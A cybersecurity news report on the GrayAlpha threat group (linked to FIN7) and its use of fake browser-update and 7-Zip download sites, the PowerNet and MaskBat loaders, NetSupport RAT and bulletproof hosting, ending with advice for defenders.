GrayAlpha Hacker Group Exploits Browser Updates to Deploy PowerNet Loader and NetSupport RAT

A new infrastructure linked to GrayAlpha, a cybercriminal entity overlapping with the notorious FIN7 group, has been exposed.

This financially motivated threat actor, active since at least 2013, is known for its sophisticated attacks targeting retail, hospitality, and financial sectors.

Custom Malware Uncovered

The latest findings reveal GrayAlpha’s use of custom malware, including a PowerShell loader dubbed PowerNet, designed to decompress and execute NetSupport RAT, a remote access trojan widely abused for malicious purposes.

Additionally, a second loader, MaskBat, bears similarities to the known FakeBat malware but is heavily obfuscated and contains unique strings tied to GrayAlpha’s operations.

This discovery underscores the group’s persistent innovation in evading detection and maintaining access to compromised systems.

Insikt Group identified three primary infection vectors employed by GrayAlpha to distribute NetSupport RAT, showcasing their diverse and deceptive tactics.

Among these, fake browser update pages impersonating legitimate services like Google Meet, SAP Concur, and LexisNexis have been active since April 2024, tricking users into downloading malicious payloads via seemingly innocuous prompts.

Another vector involves fraudulent 7-Zip download sites, which remain active with newly registered domains appearing as recently as April 2025.

Infection Vectors Leverage Fake Updates

The third method utilizes the previously undocumented TAG-124 traffic distribution system (TDS), highlighting GrayAlpha’s ability to exploit lesser-known delivery mechanisms.

Infrastructure analysis reveals heavy reliance on bulletproof hosting providers like Stark Industries Solutions (AS44477) and entities tied to Baykov Ilya Sergeevich (ORG-HIP1-RIPE), facilitating the persistence of their malicious domains and IP addresses despite mitigation efforts.

These hosts have historically supported FIN7 malware like POWERTRASH and DiceLoader, reinforcing the overlap with GrayAlpha’s tradecraft.

The fake update sites often employ fingerprinting scripts with functions such as getIPAddress() and trackPageOpen(), which relay victim data to CDN-themed domains before delivering payloads through endpoints like /download.php.

This multi-stage approach ensures that only targeted systems receive the malware, complicating detection.

Meanwhile, historical data shows FIN7’s prior use of typosquatted domains like advanced-ip-sccanner[.]com as early as 2023 to distribute Carbanak backdoors, indicating a long-standing pattern of impersonation tactics now refined by GrayAlpha.

The group’s operational resilience, even after high-profile indictments of FIN7 leaders by the US DOJ in 2018, points to a deeply compartmentalized structure akin to a professional business, with specialized teams for malware development, phishing, and post-compromise activities.

Defenders are urged to adopt stringent application allow-lists to block deceptive downloads and to implement employee training focused on recognizing malvertising and suspicious prompts.

Detection rules, such as YARA signatures and network monitoring via tools like Recorded Future Network Intelligence, are critical to identifying evolving threats.

As cybercrime continues to professionalize, with groups like GrayAlpha mirroring the persistence of state-sponsored APTs, organizations must remain vigilant and adaptive to counter this growing menace.

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates